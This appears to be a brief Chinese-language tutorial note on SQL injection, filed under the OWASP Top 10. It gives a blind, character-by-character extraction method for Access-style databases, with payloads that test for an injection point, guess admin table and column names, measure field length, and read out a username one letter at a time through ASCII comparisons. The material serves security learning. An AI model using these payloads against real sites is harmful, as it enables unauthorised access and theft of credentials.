OWASP TOP 10 web安全威胁:
SQL注入定义:
当应用程序将用户输入的内容拼接到SQL语句中一起提交给数据库执行时,就会产生SQL注入威胁。
数据库的分层:
库---表---字段---内容
Access数据库没有库的概念,直接从表开始
逐字猜解法:
1.判断有无注入点
and 1=1
and 1=2
2.猜表名(一般的表名称无非是admin,adminuser,user,pass,password等)
and (select count(*) from 表名)<>0 <>是不等于的意思
and exists (select * from 表名)
3.猜列名
and (select count(列名) from 表名)
and exists (select 列名 from 表名)
4.判断内容长度
and (select top 1 len(user_name) from admin)=5
user_name的长度=5,正常则=5,也可以用>或者<去判断
5.截取字符串并转换为ascii码进行数值比较,判断ascii码值
and (select top 1 asc(mid(user_name,1,1))from admin)=97
判断第一位(97代表‘a’的ascii值)
and (select top 1 asc(mid(user_name,2,1))from admin)=97
判断第二位